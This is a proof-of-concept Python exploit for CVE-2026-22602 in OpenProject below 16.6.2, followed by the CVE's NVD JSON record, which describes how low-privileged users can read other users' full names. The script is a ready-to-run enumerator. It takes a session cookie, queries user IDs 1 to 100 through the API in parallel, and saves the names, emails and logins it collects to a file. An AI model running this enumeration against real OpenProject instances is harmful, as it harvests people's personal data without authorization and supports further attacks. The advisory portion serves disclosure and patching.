CVE-2026-22602

# CVE-2026-22602 PoC - OpenProject User Information Disclosure # Author: Security Researcher # Target: OpenProject < 16.6.2 import requests import json import sys from concurrent.futures import ThreadPoolExecutor, as_completed def get_user_info(base_url, user_id, session_cookie): """Fetch user information by user ID""" headers = { 'Cookie': session_cookie, 'Accept': 'application/json' } # Try API endpoint first api_url = f"{base_url}/api/v3/users/{user_id}" try: response = requests.get(api_url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'name' in data: return { 'id': user_id, 'name': data.get('name'), 'email': data.get('email', 'N/A'), 'login': data.get('login', 'N/A') } except requests.RequestException: pass return None def main(): if len(sys.argv) < 3: print("Usage: python cve-2026-22602.py <target_url> <session_cookie>") print("Example: python cve-2026-22602.py https://openproject.local 'session_id=abc123'") sys.exit(1) base_url = sys.argv[1].rstrip('/') session_cookie = sys.argv[2] print(f"[*] Starting enumeration on {base_url}") print(f"[*] Target: OpenProject < 16.6.2") print(f"[*] Vulnerability: Information Disclosure - User Full Name Disclosure") print("-" * 60) users = [] # Enumerate users from ID 1 to 100 (can be extended) with ThreadPoolExecutor(max_workers=10) as executor: futures = {executor.submit(get_user_info, base_url, uid, session_cookie): uid for uid in range(1, 101)} for future in as_completed(futures): result = future.result() if result: users.append(result) print(f"[+] Found User ID {result['id']}: {result['name']} ({result['login']})") print("-" * 60) print(f"[*] Total users enumerated: {len(users)}") # Save results with open('enumerated_users.json', 'w') as f: json.dump(users, f, indent=2) print(f"[*] Results saved to enumerated_users.json") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-22602", "sourceIdentifier": "[email protected]", "published": "2026-01-10T02:15:49.057", "lastModified": "2026-01-14T22:26:18.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low‑privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users’ full names by iterating through these URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Antes de la versión 16.6.2, un usuario con pocos privilegios y con sesión iniciada puede ver los nombres completos de otros usuarios. Dado que los ID de usuario se asignan de forma secuencial y predecible (por ejemplo, del 1 al 1000), un atacante puede extraer una lista completa de los nombres completos de todos los usuarios al iterar a través de estas URL. El mismo comportamiento también puede reproducirse a través de la API de OpenProject, permitiendo la recuperación automatizada de nombres completos también a través de la API. Este problema ha sido parcheado en la versión 16.6.2. Aquellos que no puedan actualizar pueden aplicar el parche manualmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.2", "matchCriteriaId": "BF8C07E6-1B04-4E9E-A12C-8CB0A17A95D5"}]}]}], "references": [{"url": "https://github.com/opf/openproject/commit/fb39a779f521d9b08f1e0c9e8aff2b6d4643ea37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/opf/openproject/pull/21281", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/opf/openproject/releases/tag/v16.6.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opf/openproject/security/advisories/GHSA-7fvx-9h6h-g82j", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}